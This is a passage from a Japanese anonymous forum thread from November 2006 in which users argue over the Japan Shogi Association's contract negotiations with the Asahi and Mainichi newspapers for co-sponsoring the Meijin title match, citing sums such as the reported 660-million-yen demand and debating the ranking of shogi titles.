>>156の共催額5億4500万は普及協力金などを含んでのお金ね。
了解。それなら納得いく。
正直、なにいってんだこいつと思ってました。

その額なら、新聞社がまだ将棋にお金つかう気があるならあるかも。
普及協力金や臨時棋戦は一時的なものだし。

仮に、共催名人戦が、3億5500万(朝日提案額)で、
それに、朝日が最初に提案した
将棋普及協力金1億5000万+臨時棋戦契約金4000万
これだけでも、5億4500万超えるしね。
(俺は出し渋ってくると思うが。)

> としたのは、新聞社の交渉術と考えていい。
そのとおり。

>だから連盟は共催交渉の際これらをまとめた金額で交渉する必要がある。
そのとおり。
でも、連盟のこの狙いを、新聞社にけん制されちゃったんだよね。


164 : ◆iwbgLiTpNU :2006/11/08(水) 01:36:11 ID:5A/qQCi4
>>163
ふむ。後は連盟の交渉能力次第だけど、連盟にとって5億4500万は
最低超えなければならないノルマ。
なぜなら朝日単独案は毎日の契約金を含めずの値段だからね。
仮に朝日単独案を採用した場合、毎日が将棋欄を作ろうとすれば
その契約金が5億4500万にプラスされることになる。
だからこの朝日単独案ってのは、実際かなりお得な条件なんだよ。


前に毎日案を投票したときに、「朝日案が採用されれば毎日は
撤退!王将戦も撤退!」と騒いでた人いたでしょ?
あれは朝日案と毎日案の値段を比較したとき、「朝日案の場合
には、毎日の棋戦契約金と王将戦の契約金を含めずに計算させる
ことで、朝日案よりも毎日案の方がお得と見せかける」という
目論見があったんだよ。
ところがあれだけ撤退撤退と騒いでいた毎日擁護の連中が、
共催が決まった途端今度は「毎日が撤退なんて妄想はやめろ」
と言い出すようになった。
今度は毎日にとって撤退はリスクを表し、契約を不利に進める
ファクターだからね。

165 : ◆1py37ZPJ9A :2006/11/08(水) 01:45:02 ID:YefoB887
>前に毎日案を投票したときに(以下略)

妄想と現実分けて欲しいな。
IDの件、否定しないし、やっぱ話しても無駄な人なのか。


166 :名無し名人:2006/11/08(水) 01:50:16 ID:k1Uil2qq
>>164
毎日撤退厨はアンチ連盟・理事会なだけで、毎日擁護じゃないよ。

167 :名無し名人:2006/11/08(水) 02:04:50 ID:3ZxWP3s2
>>160
>もし、◆iwbgLiTpNU の日曜のIDが 「F0wlrCDF」なら、話し合うこと無いかな。
>基本的なところで、知らなかったり、間違っていたりするんじゃ、話すの疲れる。

当たりのようだよ。
こんなに認識がズレている人は数日分のレスを振り返っても1人しか該当者いないし。



朝日と毎日に即座に談話否定されたのに、連盟は談話をそのまま掲載している。
饒舌な会長もこの件は完全スルーしている。
どうするつもりなんだか・・・。

>いろんな事を正直に正確に全て公表してゆくことで理事会の意見はまとまりつつあります。
「まとまりつつあります」って、5日前には「鉄の一枚岩です」って書いてたのに・・・。

168 : ◆iwbgLiTpNU :2006/11/08(水) 02:06:09 ID:5A/qQCi4
>>165
IDの話しで言い争う気はないよ
下のような朝日案と毎日案との比較、中立に見えて全て
「毎日は撤退」を前提で計算してるよね。
当時は毎日が撤退することが「常識」だった。


26 名前: 名無し名人  2006/06/06(火) 02:57:02 ID:QDX4HmIy
    名人戦が現状のままと朝日に移った場合の5年後と10年後の合計金額を比較してみる。(王将戦は考慮せず)

    現状
    毎日・・・名人戦3億3400万
    朝日・・・朝日オープン1億3480万

    朝日に移行した場合
    名人戦3億5500万(+2100万)
    臨時棋戦4000万、普及協力金1億5000万(前2つは5年間のみ)、朝日オープン廃止−1億3480万

    よって5年後のトータル金額は
    現状・・・(3億3400万+1億3480万)×5=23億4400万
    移行・・・(3億5500万+4000万+1億5000万)×5=27億2500万
    となり3億8100万の増収だが
    10年間のトータル金額は
    現状・・・(3億3400万+1億3480万)×10=46億8800万
    移行・・・3億5500万×10+(4000万+1億5000万)×5=45億
    となり1億8800万の減収となる。

    また、毎日が朝日の提示並み(+2100万)に名人戦の契約金をアップした場合は
    5年間で2億7600万の増収であるが、10年間では3億9800万の減収となる。

    さらに、棋士の収入源となる棋戦の朝日オープンが廃止されることにより(5年間は臨時棋戦があるがそれでも9480万のマイナス)、棋士の収入面から言えば大幅に減収となる。

169 :名無し名人:2006/11/08(水) 02:07:28 ID:3ZxWP3s2
はい、無駄な人で確定。


170 :名無し名人:2006/11/08(水) 02:58:46 ID:F5u+QiKg
1ヶ月以内に驚くことが起きます

171 :名無し名人:2006/11/08(水) 03:07:16 ID:ot9HrB+R
無駄な人は今後皆でスルーするとして、本質的な思い違いが皆にある。
もう忘れてしまったかも知れないが、※ジョンイルが朝日に移転したかった
一番の理由は名人戦の契約金などではなく、普及協力金である。
だって※ジョンイルは引退した人なので名人戦の契約金が増えても一銭も
懐に入らない。
漏れも忘れそうになっていたけど、ここを押さえとかないと今後の連盟の行動
は理解出来ないものとなるであろう。
※ジョンイルは低い契約金でも呑むが、その代わり普及協力金を強くプッシュ
してくる筈。
まぁ、見ててごらんって。契約金は安目であっさり決まり、その分普及協力金
が存続する。
だから引退棋士に連盟の理事をさせるのはイケナイと思う。一番分かりやすい
のは、竜王ホルダーが理事長、名人ホルダーが副理事長、任期は防衛に失敗
するまで。これなら誰も文句は言わない。

172 :名無し名人:2006/11/08(水) 03:07:56 ID:fXLmVMm7
場違いに割り込んでスマソだが。
朝日と毎日が「朝日オープンと王将戦は別交渉」といっているのはむしろ誘いの隙だと思うけどなあ。
理事会が何が何でもトータル収入確保をめざして「現行名人戦+王将戦+朝日オープン全体でまとめて交渉しましょう」
なんて主張したら、案外あっさり朝日毎日連合は、
「わかりました。王将戦と朝日オープン戦を廃止して大名人戦に5億7千万円出しましょう」とか言いそうな気がする。

おそらく王将戦や朝日オープンの番勝負の設営には連盟に払う契約金とは別に数千万円くらいかかっているはず。
大名人戦に統合されれば、その分の経費が浮くことになる。

特に毎日グループは名人・王将で契約金+諸経費で5億数千万円使っていたはず。
それが大名人戦の契約金2億8千万+諸経費4千万=3億2千万円くらいで済むようになるわけで、
2億円以上浮く計算になる。


173 :名無し名人:2006/11/08(水) 03:14:53 ID:fXLmVMm7
むしろ連盟にとっては、名人戦、朝日オープン、王将戦のそれぞれの契約を別々に
維持したほうが中長期的には得だと思う。
出来れば契約満了時がダブらないようにずらして、リスク分散を図る。

5億7千万の大タイトル戦が出来たら、連盟は二社連合に頭が上がらなくなる。
名人ですら牛丼を食べさせられるかもしれん(w。

それは冗談としても新聞社の共催なんて始めての経験だし、連盟の会長はDQSだしで
どんなハプニングがこれから起きるか知れたものではない。
何かの件で朝日・毎日の双方を切れさせて、大名人戦が立ち往生した場合、
これだけの契約金を出せる他のスポンサーを見つけることが困難になる。




174 :名無し名人:2006/11/08(水) 03:16:58 ID:fXLmVMm7
とりあえず名人戦の契約金は3億5千万くらいでサインして、
朝日オープンと王将戦は「次の更新時まで現状維持」ということに出来れば
連盟の大勝利ではないか。

175 :名無し名人:2006/11/08(水) 03:34:02 ID:ot9HrB+R
だから協力普及金がないと※ジョンイルとしては敗北なんだって

176 :名無し名人:2006/11/08(水) 03:46:04 ID:NZIPylXn
ミイラ取りがミイラになりそうやね。

177 :名無し名人:2006/11/08(水) 04:10:58 ID:NZIPylXn
※の次以降の会長次第では、また毎日に逆戻りというのも
十分に考えられる。

178 :名無し名人:2006/11/08(水) 04:18:32 ID:NZIPylXn
毎日が王将戦だけってのもイメージに合わないなぁ。
王将と言えば阪田三吉だし。
むしろ朝日に王将戦を譲って、竜王戦に匹敵するような棋戦に
育ててもらった方が、イメージとしてはしっくりくるんだけどねぇ。

179 :名無し名人:2006/11/08(水) 16:00:10 ID:XK6+cTtH
>>178
そうなんだよ、みんな名人戦・名人戦って言って騒いでいるけど、
棋界史で序列第二位のはずの王将戦が今となっては新参者の棋王戦
よりも格下の棋戦となってしまっていることの方が問題、というか
勿体無い。
これを名人・竜王に継ぐビッグ・タイトルとなれば3大棋戦として
盛り上がると思うんだけどねぇ。
やっぱこれは、毎日にふたつ押し付けた大山の失策じゃないのかな。

180 :名無し名人:2006/11/08(水) 19:00:53 ID:RMX8MOd2
まあ、金は横に置いといて棋戦が多すぎるよな。
棋聖とか棋王って言われてもって感じで・・。名人・竜王・王将の3つでいいよ。
あとは、〜選手権とかでいいじゃん。

181 :名無し名人:2006/11/08(水) 19:37:12 ID:kNE4pvbk
連盟もここの人たちもほとんど論じていない問題があると思うんだけど、
もし本当に共催なんて冗談が実現したら、実際の紙面はどうなるの?
朝日も毎日も同じ名人戦の第1局なら第1局を載せるわけだよね。
たとえばどっちかが30手目までしか載せてない日に片方が31手目まで
載せるなんてことがありうるのか? それは棋譜の初出掲載にこだわる
新聞社にとって問題がないことなのか? 
それとも両社談合して譜割りまで足並みを揃えるのか? そうなると
観戦記者が制約を受けて観戦記がつまらなくなるのではないのか?
などなど、共催下での現実の紙面がまったくイメージできないのだが。
スクープ合戦にでもなればいいけど多分そうはならないだろうし。



182 : ◆1py37ZPJ9A :2006/11/08(水) 19:52:54 ID:YefoB887
>>172
他全部切って大名人戦は、共催期間終わってから単独主催を狙うとき、
契約金さげづらくて新聞社にとっても都合のわるい面がある気がする。

新聞社からしたら、名人戦だけ単独主催を、
契約金3億4,5千万ぐらいでやりたいというのが本音じゃないかな。
そうはいかないから、王将戦とか普及協力金とかをみせているわけで。


183 : ◆1py37ZPJ9A :2006/11/08(水) 20:02:27 ID:YefoB887
共催期間が偶数年になる可能性ないかな?

主催社名の記載順序は、自社の紙面などでは自社名を先に書けばいいかもしれないけど、
それ以外の雑誌やら解説会などでは、どっちを先に記載するかで困る。
年度ごとに順番を入れ替えるにしても、共催期間が奇数年だと
偏りができてしまうので、偶数年の契約にする。


184 :名無し名人:2006/11/08(水) 20:53:01 ID:Y7GqxYqC
>>181
挑戦手合い7番勝負の棋譜は、記事としてすぐに紙面に掲載されるので、
観戦記での棋譜の初出掲載にこだわる必要は、あまりないように思う。

新聞社も、読者もそれほど気にしないんじゃないかな。



185 :名無し名人:2006/11/08(水) 21:38:02 ID:ZwAS70Si
というか、将棋界と新聞両社にとって大事なのは
「名人戦、オープン(臨時棋戦)、王将、協力金」の総額が5億5000万を越えるかどうか。
(もっというとアマ棋戦その他の条件も含まれる)

先に名人戦の契約を王将などと先に切り離して決めるなんてできないと思うんだが。

186 :名無し名人:2006/11/08(水) 21:43:36 ID:qchIwb6w
連盟から10日、17日に何か発表あるようじゃん。それ待ち。
17日が名人戦関連かな。

187 :名無し名人:2006/11/08(水) 22:17:39 ID:s7ZM/Iqa
※正日にとてもはや契約金なんかどうでも良いの。
関心事は自由に使える普及協力金だってば。

188 :名無し名人:2006/11/08(水) 22:35:06 ID:J2WezoQC
とりあえずここ数日の流れで「新聞社は将棋から撤退する(すべき)」というキチガイがいなくなったのは
喜ばしいことだな。

189 :名無し名人:2006/11/08(水) 22:38:06 ID:5A/qQCi4
>>172-173
今回はともかく、5年後の名人戦交渉は難しくなりそう。
競争原理が働かないと、値段も上がらないだろうし。
ただ朝日オープンを廃止したいのは朝日の意向と思うので、
これはなんにせよ無くなりそう。
経費については新聞社の費用効率が上がるならそれはいいことと思う。
野球ですら現状維持だけではジリ貧に陥ったため新しいことを
試している訳で、将棋もただ棋譜の権利を売る以外の試みが
必要かもしれない。


さて、共催案は5億4500万は超えるだろうという私見とその根拠は
話せたので、それに対して何か議論するなら続けるし、ないなら
コテはもうはずすね。
後半は確かに言い過ぎたと思う。

190 :名無し名人:2006/11/08(水) 22:48:54 ID:jp+ImHK8
将棋界って序列とか金とか気にしすぎじゃない?
ゴルフだとメジャーの全米プロより世界選手権の賞金のほうが上だと思うけど
それでもメジャーは全米プロ、四大大会はコロコロ変わらないよ、いちいち序列もつけないし(何となくはあるんだけど)。
テニスも全豪オープンはやや規模が小さいが昔からメジャーと決まってる、
ウィンブルドンが格上感あるがこれも正確な順位はついていない。

将棋界は新聞社への配慮のためか、タイトルにいちいち順位つけて賞金変わるたびにコロコロ序列変える・・・
みたいなことはあまりよくないと思うけどねえ。イメージがいくないでしょ、金で左右されるのは。
まあ世間は将棋の七大タイトルの序列なんて知らないだろうし一部将棋ヲタ以外は興味ないだろうが。

191 :名無し名人:2006/11/08(水) 22:55:28 ID:i8GRxoFx
序列にこだわるのは将棋界(連盟)ではなくスポンサーなのではなかろうか?

192 :名無し名人:2006/11/08(水) 23:20:05 ID:lYEXU1Pn
>>191
というか、こだわっているのは読売じゃないかと。

竜王戦が出来る前は、序列なんて誰も意識してなかった様な。
そもそも、序列なんて考え方が竜王戦以前にあったの?

193 :名無し名人:2006/11/08(水) 23:26:06 ID:i8GRxoFx
序列というか、名人戦がひとつ突出していて、あとは「その他大勢」だったように思う。
いちおう十段と棋聖は賞金は高かったけど、扱いにしても名人の比ではなかった。


194 :名無し名人:2006/11/08(水) 23:33:23 ID:5A/qQCi4
>>190
確かにゴルフのマスターズで緑のジャケット(名前知らないけど)着て
喜んでたり、F1のシャンパンファイトも勝負は水に流して喜びを
分かち合うのは見ていて気持ちいいね。
お金以外の喜びみたいなものがあるといいかも。
優勝者は銀色の扇子で極上の風を仰ぐとか、キモいな。
座布団ファイトとか、無理だな。

195 :名無し名人:2006/11/08(水) 23:38:01 ID:lYEXU1Pn
> 中原・島の二人は新聞社の人と会って帰ってきました。

まさか毎日に行って、「共催で浮いた契約金で、普及協力金を払って貰っても構わない」
なんて間抜けな事言ってないよね。

196 :名無し名人:2006/11/08(水) 23:40:13 ID:UzytbagO
相撲は全く差がないな
夏場所も九州場所も同等

197 :名無し名人:2006/11/08(水) 23:44:18 ID:i8GRxoFx
>>190
20年以上前、全英オープンは、優勝賞金がとても安かった。
当時のマスターズの半分もなかった。
それでも伝統のメジャーとしての格を誰もが認めた。

あと、ライダーカップは賞金が出ないが、名誉を賭けたガチンコの一戦。


198 :名無し名人:2006/11/08(水) 23:47:45 ID:i8GRxoFx
古い記憶が確かなら、相撲は、かつて場所ごとに差があったと思う。
本場所と地方場所に格差があった。


199 :名無し名人:2006/11/09(木) 00:12:39 ID:w5QRu/Ta
>>192
1997年以前は名人竜王以下のタイトルにも厳格に序列が存在した
米長四冠→米長十段、羽生四冠→羽生王位、羽生五冠→羽生棋聖という肩書きだったらしい
当時の規定を適用すると現在の肩書きと序列は
森内名人 渡辺竜王 佐藤棋聖 羽生王位

26 :名無し名人:2006/08/26(土) 18:55:52 ID:XTh17ryL
羽生善治の肩書きの変遷
四段→五段→六段→竜王→前竜王→棋王→王座(92年福崎から
奪取して2冠になると棋王から肩書きが変わった)→竜王→棋聖
(93年佐藤康光に敗れて竜王失冠。棋聖・王位・王座・棋王の
4冠王。代表して棋聖と呼ばれた)→名人→竜王・名人→名人→
四冠(97年谷川に敗れて名人失冠。王位・王座・棋王・王将の
4冠王。この時から●冠王という呼称が定着)→五冠(00年、
谷川から棋聖奪取)→四冠(01年郷田に棋聖を取られる)→
竜王→竜王・名人→名人→王座(04年。森内に名人を取られた
時点で)→二冠(谷川から王位奪取)→三冠(森内から王将奪回)
→四冠(谷川から棋王奪取)→三冠(森内に棋王を取られる。
現在の羽生の肩書き)。 私の調査に一点の曇りもない。

大山 http://game9.2ch.net/test/read.cgi/bgame/1156398340/41
加藤 http://game9.2ch.net/test/read.cgi/bgame/1156398340/45
米長 http://game9.2ch.net/test/read.cgi/bgame/1156398340/50
中原 http://game9.2ch.net/test/read.cgi/bgame/1156398340/29
谷川 http://game9.2ch.net/test/read.cgi/bgame/1156398340/27

200 :名無し名人:2006/11/09(木) 00:29:04 ID:pVAZzLda
さて今週金曜と来週金曜に何の発表があるのか>泥沼日記予告


201 :名無し名人:2006/11/09(木) 00:45:49 ID:lF9ggKIh
「序列」が騒ぎの対象になりだしたのは囲碁で関西棋院が独立した時らしい。
どっちの棋士が関西へ出向く(実用)か上座に座るか(権威)とかの問題が生まれた。
囲碁は外国人棋士もいて国際問題、在日棋士がいて人権問題になるので、
契約金が高い方が予選数が多くて賞金が高くて序列高いと非常に明確。
で、囲碁の名人戦騒動の際、名人戦より上の「序列」って名目で大金出した。

「格」ってのは本来、数字とかで表せないその場の雰囲気みたいなものなんだが、
囲碁は対外的な問題がある為に序列を明確化してる。

将棋界でも読売棋聖戦にならって序列1位の竜王戦を高く売った。
問題は棋士たち、はては理事(タナトラ)みたいに「一番権威のある名人戦」
とか口にしてしまい、序列の価値を損なうようなことをしてしまう点だと思う。

202 :名無し名人:2006/11/09(木) 02:34:02 ID:W/0Ym6J3
今回共催で名人戦の契約金が竜王戦を上回っても連盟は竜王戦が序列一位と
言い張るのだろうか、それとも名人戦を超えるよう契約金の上乗せを読売に
頼むのだろうか。まぁ、それはよみくま氏が先回りして釘を刺している訳だが。

203 :名無し名人:2006/11/09(木) 02:56:35 ID:JWGZzUan
この際、契約金がどういう形であれ名人戦>竜王戦って事になったら、スパッと序列も
名人戦>竜王戦にしてみるのもいいんじゃない?
そこで読売の出方というか、ケツの穴のでかさを計るのも一つの手だろう。

204 :名無し名人:2006/11/09(木) 07:01:03 ID:z7COGTDh
11月7日の話として会長日記、
> 中原・島の二人は新聞社の人と会って帰ってきました。報告を聞く。
> それを取材する新聞社が何社かある。

というわけでその取材結果が朝刊に載ってますが、
連盟の条件提示は二社になったから二倍ということのよう。
これは共催とはいわないのでは?

205 :204:2006/11/09(木) 08:55:21 ID:z7COGTDh
連続ですまないが、手元の朝刊は日経で、
それによると連盟は10月20日に条件提示したという。
ということは、新聞連合側は11月1日の発表で、それを否定したということになるのか?

また、日経には契約年数等について記述がなく、連盟が要求している契約金以外の
名人戦振興金&普及協力金が一時金なのか、毎年なのかが不明。

以上二点、他紙ではどういう報道なのだろうか。


206 :名無し名人:2006/11/09(木) 09:12:28 ID:rXzkRacn
>>205

読売かなと思ってなかったと思ったら、日経ね。

将棋連盟、6億6000万円提示・名人戦共催の朝日と毎日に
http://www.nikkei.co.jp/news/shakai/20061109AT1G0803308112006.html

新聞の方がWebより詳しく書いてありそうだけど。

ここまでアホなことやると、スポンサーなしで名人戦を開催するケースもあり得るね。

207 :名無し名人:2006/11/09(木) 09:25:44 ID:LIdQGDKd
>>204
>連盟の条件提示は二社になったから二倍ということのよう。
>これは共催とはいわないのでは?

同感。ちょっとこれはいくらなんでも・・・。
しかしこれ、妙に見慣れた要求額にも見える。このスレで何度も書かれていたような。
やはり連盟の関係者がスレに常駐して書き込みしているってことのようですねえ。

208 :204-205:2006/11/09(木) 09:34:19 ID:z7COGTDh
レスどうもです。「年6億6千万」ってあるから、+アルファ分も毎年なんかな。

日経朝刊から金額の話だけ抜くと、
> 連盟が示した条件は
> 名人戦契約金各二億円、名人戦振興金各三千万円、普及協力金各一億円で、
> 十月二十日に両社に提示したという。
> 現在、毎日が単独主催している名人戦の契約金は年三億三千四百万円。

連盟の提示は交渉の叩き台とは思うけど・・・


209 :名無し名人:2006/11/09(木) 09:47:05 ID:+VHXOmgL
6億6千万円を提示って! 超おかしい。将棋脳だな。
ttp://www.nikkei.co.jp/news/shakai/20061109AT1G0803308112006.html


210 :名無し名人:2006/11/09(木) 10:11:58 ID:rXzkRacn
もし今回の騒動の発端が本当にNSN問題だとすれば、両社は既に詳しい事情を掴んで
いる筈。
こんな調子でやって大丈夫なのかねぇ。

まあ、NSN問題がガセだとすれば、それを材料にされる事はないんだが。

211 :名無し名人:2006/11/09(木) 10:33:23 ID:D1EawC6L
※ジョンイルはなんかもう将棋脳全開って感じだな。
こうなったらもうなんか徹底的にやってくれ、っていう気分になっちゃうね。

212 :名無し名人:2006/11/09(木) 11:07:51 ID:X5lydlcW
吹っかけましたねぇー

213 :名無し名人:2006/11/09(木) 11:20:34 ID:BYysCFCO
王将戦(7800万)も無くなる事が前提なら6億6千万でも妥当な額だけど、どうなんでしょうね。

214 :名無し名人:2006/11/09(木) 11:24:02 ID:ifr+UwDc
読売も入れて10億にしちまえ。

215 :名無し名人:2006/11/09(木) 11:46:58 ID:X5lydlcW
>>213
「連盟が減収にならない額」と
「名人戦の妥当な価値」とは
違うのでは?

216 :名無し名人:2006/11/09(木) 11:52:53 ID:BYysCFCO
>>215
妥当な価値なんて曖昧なものは議論しようがない。
朝日単独提案時の5億4500万(朝日オープン縮小含む)+王将戦(7800万)=6億2300万
より少し高い程度なので妥当と言ったまで。

217 :名無し名人:2006/11/09(木) 11:58:20 ID:X5lydlcW
>妥当な価値なんて曖昧なものは議論しようがない。

連盟と毎日朝日は、それを議論していくよ。

218 :名無し名人:2006/11/09(木) 12:01:36 ID:0T99UUTY
6億6000万とはふっかけたもんだ。
理事会は一枚岩と言い続けるのも分かる。
おそらく毎日朝日提示の3〜5億の常識的な額を呑もうって奴と激論になったなw

……あえて言うなら「読売が怒り心頭に発して撤退」を想定した額だ。
大名人戦になったら、読売は撤退か3位の棋聖戦より少し上しか出せない、
と内々に読売から言われてるんじゃないか?
 竜王戦(読売新聞) 3億4150万円
 棋聖戦(産経新聞) 1億4650万円

219 :名無し名人:2006/11/09(木) 12:18:39 ID:z7COGTDh
公式発表前に取材に応じてしまうあたりが、例によって連盟ならではですかね。
で、話がお金のことばかりになってしまう。
公式発表では連盟の姿勢、将来ビジョンを示してほしいものだ。
「名人戦振興金」がなぜ連盟側に必要なのかとかさ。

新聞側は棋院とのバランスもあるだろうしね・・・

220 :名無し名人:2006/11/09(木) 12:35:15 ID:eohyquk2
ダメ元で言ってみるのが勝負師

221 :名無し名人:2006/11/09(木) 14:34:24 ID:NKOWC86I
……で、名人戦のどこに6億6千万の価値があるんだ?
商品価値は去年と同じだろ? 
むしろ年々斜陽化し、落ちているといってもいい。それで契約額は2倍って……
誰か連盟に世間の厳しさを教えてやってくれよ!

222 :名無し名人:2006/11/09(木) 14:35:39 ID:rXzkRacn
今回初めて出てきた「名人戦振興金」。
これは、朝日・毎日両社は当然払わないし、読売が猛反発するだろうね、
新聞社が連盟に振興金を払うと言うことは、タイトル戦は連盟だけの財産で、
それを使わせてあげるんだから金を払えと言っている訳でしょ。

その論理を竜王戦に持ち込んだら、竜王戦は自分のものと思っている読売
と真っ向から対立する事になる。
他のタイトル戦は連盟と共同で運営していると思っている所が多いと思うが、
実は、連盟だけの物なんだと言い出すと、気分の良い社は無いだろう。

予想だにしなかった名人戦共催で、普及協力金が出なくなりそうになり、苦し紛れ
の手を打ち、またまたパンドラの箱を開けてしまった様だね。

223 :名無し名人:2006/11/09(木) 15:18:40 ID:yuQgx+tt
朝日は断れない、もっとふっかければいいのにw

224 :名無し名人:2006/11/09(木) 15:36:46 ID:fEmNOb+o
朝日と毎日の平等条件の共催が決まった時点で、朝日と毎日は仲間になり、
時間を掛けて徹底的に値引きと条件アップを狙うのは自明だったろう。

連盟は毎日にあれだけ失礼な態度を取ったのに、実質的にことごとく折れてくれたから、
強気の姿勢を取ることに自信を持ったのかもしれないが、
それもこれも毎日には朝日という対抗軸があったからこそ。今はそれはないし、
読売はこの争いの渦中に参戦してくることはまずはなさそう。

世間の視線に耐えかねて、ついうっかり共催なんて口を滑らせたのが
連盟にとって命取りになった気がしてならんのだが。

225 :名無し名人:2006/11/09(木) 15:48:18 ID:3RCJ9V91
こんなにふっかけちゃてもし朝日が
「この金額では来年度はうちは契約を見送ります。」
とか言われちゃったらどうすんだ。


226 :名無し名人:2006/11/09(木) 16:04:48 ID:3RCJ9V91
1社あたり払う金額が単独開催なみっていうのは
どう見てもおかしいな。
2社で共催になったら名人戦そのもの価値が2倍になる
なんて計算がどうしたらできるんだろう。

227 :名無し名人:2006/11/09(木) 16:28:23 ID:nWNPDRKf
契約金の額(1社2億×2)ってのは、おそらくそこまで開きはないと思われる。
普及金その他の1億3千万ってのがミソ。
連盟にしたってこれを丸々貰えるとは思っていない。交渉の途中で王将戦などとの
バーターに使っていくんだろう。
理事会のバックには経営諮問委員もいるから、まんざらこいつらだけの暴走で
こんな数字が唐突に出てきたってわけでもなさそうだ。
日経に流したのも、何らかの目算があってのこと。中原伸之ルートかね?


228 :名無し名人:2006/11/09(木) 16:39:44 ID:z7COGTDh
日経朝刊によれば、日経に話したのは中原連盟副会長。
会長日記にあるとおりってことかな。

229 :名無し名人:2006/11/09(木) 17:02:45 ID:Y3h03+/t
もう、手の施しようがない。めちゃくちゃだな。
いまの連盟理事会が想像以上のアホの集まりであることがわかったよ。


230 :名無し名人:2006/11/09(木) 17:28:18 ID:KlG+ws+v
契約金の額だけでも読売を越えるから竜王戦減額の覚悟があると思う。
それと、やっぱり王将や臨時棋戦より自由に使える金が欲しいんだな。
でもこれだと、毎日単独案に反対したトッププロ達を敵に回す形になるな。

231 :230:2006/11/09(木) 17:29:38 ID:KlG+ws+v
 失礼しました。
×毎日単独案に反対したトッププロ達を敵に回す形になるな。
○毎日単独案に賛成したトッププロ達を敵に回す形になるな。

232 :名無し名人:2006/11/09(木) 18:10:13 ID:+e3ITs3Q
どちらが名人戦を盛り上げるか、勝負だ。

233 :名無し名人:2006/11/09(木) 18:40:18 ID:9So/ymMg
連盟HP→ヤフオク
見てみ

時代は動いてるね
乗り遅れないようにね

やっぱ米長は最高だよ


234 :名無し名人:2006/11/09(木) 19:12:27 ID:hGnDrHfU
連盟と朝日が裏でつながっているとすれば、
毎日を降ろすのが目的なのかも。
そうではなく、ただ単にふっかけただけであれば
連盟がただの馬鹿ということだろう。
少なくとも名人戦の価値が6億6千万もあると思う奴はいないだろうね。

235 :名無し名人:2006/11/09(木) 19:15:26 ID:SFKP9I2D
まあ交渉なんだから別にふっかけるのもありじゃね

236 :名無し名人:2006/11/09(木) 19:24:15 ID:Y3h03+/t
交渉は、ただふっかければいいというものではなかろう。
ギリギリの落としどころを想定して吹っかけるのならいいが。
あれじゃあ、ただのヤケクソの出たとこ勝負じゃないのか。


237 :名無し名人:2006/11/09(木) 19:26:25 ID:SFKP9I2D
ヤケクソだったかどうかは結果を見ないと何とも言えんしな

238 :名無し名人:2006/11/09(木) 19:32:10 ID:Y3h03+/t
>>237
君は、あんなデタラメなクレクレが実を結ぶと思うかい?


239 :名無し名人:2006/11/09(木) 19:34:31 ID:SFKP9I2D
>>238
そこまで内部事情に詳しくないからわからんとしか言いようがないw
ただこのスレの予測は今までほとんど当ってないから、みんなそうなんじゃないの

240 :名無し名人:2006/11/09(木) 19:36:19 ID:Y3h03+/t
確かに、予測は当たらないなぁ。
連盟の素っ頓狂な動きは、我々常識人には読めないんだよ。


241 :名無し名人:2006/11/09(木) 19:38:05 ID:uey+2/CU
振りだしに戻るんじゃなかろうかw

242 :名無し名人:2006/11/09(木) 19:38:52 ID:KlG+ws+v
しかし「とんでもない額をふっかけた」というのは間違ってない。
理事会も長時間に渡って揉めたらしいし。
さすがに6億6000万をふっかけたら新聞社がブチ切れると思った理事もいたんだろう。

243 :名無し名人:2006/11/09(木) 19:40:35 ID:7MFSKB61
>>234
毎日をおろすためなら、単独主催否決の時に共催なんか申し込まなきゃよかった。
なんでわざわざ共催を持ちかけておいて、毎日をおろそうとするのか?

244 :名無し名人:2006/11/09(木) 19:43:15 ID:XPinA7Ze
皆の衆、ここで改めて例の駄文を噛みしめて読もう。

 名人戦共催につきまして毎日新聞社と朝日新聞社が合意されましたことを歓迎いたします。

 先日、日本将棋連盟より提示しました契約金ほか総額についても、おおむね了承されたことに感謝いたしております。
 以上、よろしくお願いいたします。

2006年11月1日
社団法人日本将棋連盟
広報担当理事 西村一義


245 :名無し名人:2006/11/09(木) 19:43:28 ID:Y3h03+/t
米長その他の将棋脳的思考を推測すると・・・

毎日潰しで仕掛けた共催案が思わぬ方向でまとまりかけ、
調子に乗った連盟は「ついでにカネの上乗せもしてやれ」
とばかり場当たりな額を吹っかけた。


246 :名無し名人:2006/11/09(木) 19:46:28 ID:9So/ymMg
連盟は日々進化してますね
ネット棋戦も決まったようだし、ヤフオクにも出品しだしたし
米長効果ですよ。

247 :名無し名人:2006/11/09(木) 19:47:03 ID:Y3h03+/t
>>244
まるで焼け太り狙いでマッチポンプで火をつけた火事場泥棒の口上だな。

248 :名無し名人:2006/11/09(木) 19:48:05 ID:liZDyvC/
ますます盛り上がってまいりましたw

連盟の提案は交渉相手のことを全く考えずに自分の都合だけから割り出したものに見える。
棋譜掲載は独占でなくなったのだから、その分一社当たりの価値は下がると考えるのが
通常の思考。ついでに出てきた金の名目も今ひとつ意味不明。

個人的には、朝日毎日には振興金や普及協力金よりは契約金を上げる方向で交渉し、
少なくとも怪しげな名目の金の使用内容を限定させ、
かつそのような金を要求する連盟の財務内容にも踏み込んで貰いたいところ。

恐らく交渉は(一部のお祭り好きの方々の予想に反して)
それなりの線でまとまるのではないかと(まだ)思っているが、
いずれにせよ、今回のことは長期的には連盟には大きなマイナスになったと思う。
次期の会長や理事になる方々はご愁傷様。

249 :名無し名人:2006/11/09(木) 19:54:52 ID:DuMxr8KW
理事会の行動を点で見ると基地外としかいいようがないけど
新聞社との数十年の関わりで何があったか、線ではわからないから、
(下手に出て足元見られた歴史があるかもしれないし)、
今の偏った情報しか入らない状況ではぐだぐだ言ってないで結果を待つしかないと思うがねぇ

250 :名無し名人:2006/11/09(木) 19:59:00 ID:liZDyvC/
>>249
そりゃそうだが、それを2chで言っちゃあ(ry

251 :名無し名人:2006/11/09(木) 20:06:17 ID:z7COGTDh
日経朝刊によれば、連盟は両社に10・20に条件提示したそうだ。
それを信じるなら、でも11・1の朝日毎日側の合意三カ条はあれだったと(「契約金は折半」等)。
だから連盟は理事会を開いて同日あのコメントだろうし(「契約金ほか総額」等)、
それに対し新聞側も同日あのコメントだったと(「驚いている」等)。

日経によると、連盟は8日に交渉を促す文書を両社社長宛に送付。
それを見ているか記事ではわからないが、8日の日経の取材に対し、
朝日「交渉は始まったばかりなので・・・」
毎日「これから連盟と協議していくことなので・・・」

けっこう、すっとぼけもあるような。とにかく、うまくいってなさげ。

252 :名無し名人:2006/11/09(木) 21:41:07 ID:1CV/QhwE
また名人戦がない年になりそうですね
歴史は繰り返す
30年前と同じ、将棋脳。

253 :名無し名人:2006/11/09(木) 21:48:39 ID:XUnIM6LP
